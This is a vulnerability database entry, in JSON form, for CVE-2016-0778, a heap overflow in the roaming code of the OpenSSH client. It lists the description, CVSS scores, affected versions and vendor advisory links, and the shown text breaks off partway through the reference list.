Action not permitted
Modal body text goes here.
cve-2016-0778
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:04.062Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "name": "SUSE-SU-2016:0117", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "tags": [ "x_transferred" ], "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "name": "APPLE-SA-2016-03-21-5", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05247375" }, { "name": "20160114 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/HT206167" }, { "name": "FEDORA-2016-4556904561", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176349.html" }, { "tags": [ "x_transferred" ], "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734" }, { "tags": [ "x_transferred" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05385680" }, { "tags": [ "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "tags": [ "x_transferred" ], "url": "http://www.openssh.com/txt/release-7.1p2" }, { "name": "openSUSE-SU-2016:0128", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "name": "80698", "tags": [ "vdb-entry", "x_transferred" ], "url": "http://www.securityfocus.com/bid/80698" }, { "name": "FEDORA-2016-2e89eba0c1", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/176516.html" }, { "tags": [ "x_transferred" ], "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "name": "1034671", "tags": [ "vdb-entry", "x_transferred" ], "url": "http://www.securitytracker.com/id/1034671" }, { "name": "openSUSE-SU-2016:0127", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "name": "GLSA-201601-01", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/201601-01" }, { "tags": [ "x_transferred" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722" }, { "name": "[oss-security] 20160114 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "name": "20160115 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2016/Jan/44" }, { "name": "SUSE-SU-2016:0119", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/135273/Qualys-Security-Advisory-OpenSSH-Overflow-Leak.html" }, { "name": "SUSE-SU-2016:0118", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "name": "SUSE-SU-2016:0120", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "name": "USN-2869-1", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://www.ubuntu.com/usn/USN-2869-1" }, { "tags": [ "x_transferred" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05356388" }, { "tags": [ "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "name": "DSA-3446", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://www.debian.org/security/2016/dsa-3446" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-13T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "name": "SUSE-SU-2016:0117", "tags": [ "vendor-advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "name": "APPLE-SA-2016-03-21-5", "tags": [ "vendor-advisory" ], "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html" }, { "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05247375" }, { "name": "20160114 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "tags": [ "mailing-list" ], "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "url": "https://support.apple.com/HT206167" }, { "name": "FEDORA-2016-4556904561", "tags": [ "vendor-advisory" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176349.html" }, { "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734" }, { "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05385680" }, { "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "url": "http://www.openssh.com/txt/release-7.1p2" }, { "name": "openSUSE-SU-2016:0128", "tags": [ "vendor-advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "name": "80698", "tags": [ "vdb-entry" ], "url": "http://www.securityfocus.com/bid/80698" }, { "name": "FEDORA-2016-2e89eba0c1", "tags": [ "vendor-advisory" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/176516.html" }, { "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "name": "1034671", "tags": [ "vdb-entry" ], "url": "http://www.securitytracker.com/id/1034671" }, { "name": "openSUSE-SU-2016:0127", "tags": [ "vendor-advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "name": "GLSA-201601-01", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/201601-01" }, { "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722" }, { "name": "[oss-security] 20160114 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "name": "20160115 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2016/Jan/44" }, { "name": "SUSE-SU-2016:0119", "tags": [ "vendor-advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "url": "http://packetstormsecurity.com/files/135273/Qualys-Security-Advisory-OpenSSH-Overflow-Leak.html" }, { "name": "SUSE-SU-2016:0118", "tags": [ "vendor-advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "name": "SUSE-SU-2016:0120", "tags": [ "vendor-advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "name": "USN-2869-1", "tags": [ "vendor-advisory" ], "url": "http://www.ubuntu.com/usn/USN-2869-1" }, { "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05356388" }, { "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "name": "DSA-3446", "tags": [ "vendor-advisory" ], "url": "http://www.debian.org/security/2016/dsa-3446" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2016-0778", "datePublished": "2016-01-14T00:00:00", "dateReserved": "2015-12-16T00:00:00", "dateUpdated": "2024-08-05T22:30:04.062Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2016-0778\",\"sourceIdentifier\":\"secalert@redhat.com\",\"published\":\"2016-01-14T22:59:02.280\",\"lastModified\":\"2024-11-21T02:42:21.793\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings.\"},{\"lang\":\"es\",\"value\":\"Las funciones (1) roaming_read y (2) roaming_write en roaming_common.c en el cliente en OpenSSH 5.x, 6.x y 7.x en versiones anteriores a 7.1p2, cuando ciertas opciones proxy y forward se encuentran habilitadas, no mantiene adecuadamente los descriptores de archivo de conexi\u00f3n, lo que permite a servidores remotos causar una denegaci\u00f3n de servicio (desbordamiento de buffer basado en memoria din\u00e1mica) o posiblemente tener otro impacto no especificado mediante la petici\u00f3n de varios reenv\u00edos.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:H/Au:S/C:P/I:P/A:P\",\"baseScore\":4.6,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"HIGH\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":3.9,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-119\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"104DA87B-DEE4-4262-AE50-8E6BC43B228B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"79A602C5-61FE-47BA-9786-F045B6C6DBA8\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3356FDFD-BEA5-45A5-A36B-D1153AFE6C23\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.4:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"AA9D704A-D1E7-4989-9136-1EAD72EF6BE5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9394B8AD-AB22-4955-8774-C6BA2B56A260\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.5:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"78735121-6BA0-4158-B3D5-E4BACCA5E95A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0C5D4A9B-1194-4D63-AAC2-8701C890BB0D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.6:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"270BABBA-70A8-4FC7-962D-0D0D40F4497F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F75DB5AE-E99D-4827-B290-823E015AEE34\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.7:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"A710EC9F-1352-4DF0-B1CF-9C51ACB078CB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DA4F797B-8E2C-41AC-AA29-D6B50A539B2F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.8:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"7F482203-0CF1-403C-A25C-9B0DA24F6282\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.9:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1E74684E-71D3-4458-A8BA-5248982273F3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:5.9:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"9F3D478C-221F-4A07-8520-CD8856A75DCA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A9754B4A-3042-49B8-86F7-2D60E25400C9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.0:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"B018B05B-1311-4E0F-A9D0-620C1BF904A1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3872787F-2C1C-40C0-B9CF-A3C0CEAAB400\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.1:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"728372F8-6561-473D-B54D-1DB41DA1CF55\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"39D1E296-3040-4CC9-B95B-3E07D73F1150\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.2:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"11BDA49F-C3E7-4D32-8105-E75525BFB2D4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.2:p2:*:*:*:*:*:*\",\"matchCriteriaId\":\"CE153B9F-721D-42ED-A662-C2597B7BF073\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FCEE2677-16EE-484F-B2FB-FCA377E0D76B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.3:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"254243DD-2E3E-48ED-A92C-8F4FD405DA57\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"90798B9A-A1C6-4EC5-96BF-AF9C6FEFB63D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.4:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"BCF734D8-1F01-498C-A917-5B528BFD9CAA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5A8ABE51-1535-44D9-B2A1-CC91021A29D9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.5:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"492F661C-45E4-4B9B-AD26-1873D91DBEA6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"546EB570-C2AC-473B-BED8-C47167D2593A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.6:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"CA2C8269-9C66-4E41-A56C-ACC709DC2053\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"64382F2C-15AC-41FE-A936-CEB44C1AFB9F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.7:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"20B099B9-3D7E-47A4-94A5-B89759189D26\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"65A8629A-CFAE-4403-BEE7-622912483702\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.8:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"50836FA3-8116-4D58-B73E-B4830FB3A551\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.9:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D0607649-62FE-41CB-9444-53CD9C5B67C0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:6.9:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"3397D8DC-3410-401F-8854-BFCC35AD6686\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:7.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0B0FB8D5-75CB-4691-AB9F-B4FA46973421\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:7.0:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"42DCED2D-76C5-49D1-A72D-E578CF686F5A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:7.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"67E1B240-BD86-41D3-BAC1-96005CB31DEE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openbsd:openssh:7.1:p1:*:*:*:*:*:*\",\"matchCriteriaId\":\"4BFC8587-FB9E-4FE2-B725-81CE3CE590F8\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"10.9.0\",\"versionEndIncluding\":\"10.9.5\",\"matchCriteriaId\":\"9A5FFEDD-1D4A-42A1-964A-88696925859A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"10.10.0\",\"versionEndIncluding\":\"10.10.5\",\"matchCriteriaId\":\"6E4E9ED2-42E1-47F3-AFB4-C92A4E4FB554\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"10.11.0\",\"versionEndIncluding\":\"10.11.3\",\"matchCriteriaId\":\"2461051C-EB76-4022-8BBC-B3D26635240B\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:hp:virtual_customer_access_system:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"15.07\",\"matchCriteriaId\":\"58F4BE0A-DBE6-45F7-9FA6-6A0BE2566631\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sophos:unified_threat_management_software:9.353:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9857D3A8-7942-4624-B3D6-9943D34030B8\"}]}]}],\"references\":[{\"url\":\"http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"http://lists.fedoraproject.org/pipermail/package-announce/2016-February/176516.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176349.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/135273/Qualys-Security-Advisory-OpenSSH-Overflow-Leak.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2016/Jan/44\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.debian.org/security/2016/dsa-3446\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://www.openssh.com/txt/release-7.1p2\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Patch\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2016/01/14/7\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Exploit\",\"Mailing List\",\"Technical Description\",\"Third Party Advisory\"]},{\"url\":\"http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://www.securityfocus.com/archive/1/537295/100/0/threaded\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securityfocus.com/bid/80698\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securitytracker.com/id/1034671\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.ubuntu.com/usn/USN-2869-1\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://bto.bluecoat.com/security-advisory/sa109\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05247375\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05356388\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05385680\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://security.gentoo.org/glsa/201601-01\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://support.apple.com/HT206167\",\"source\":\"secalert@redhat.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"http://lists.fedoraproject.org/pipermail/package-announce/2016-February/176516.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176349.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/135273/Qualys-Security-Advisory-OpenSSH-Overflow-Leak.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2016/Jan/44\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party 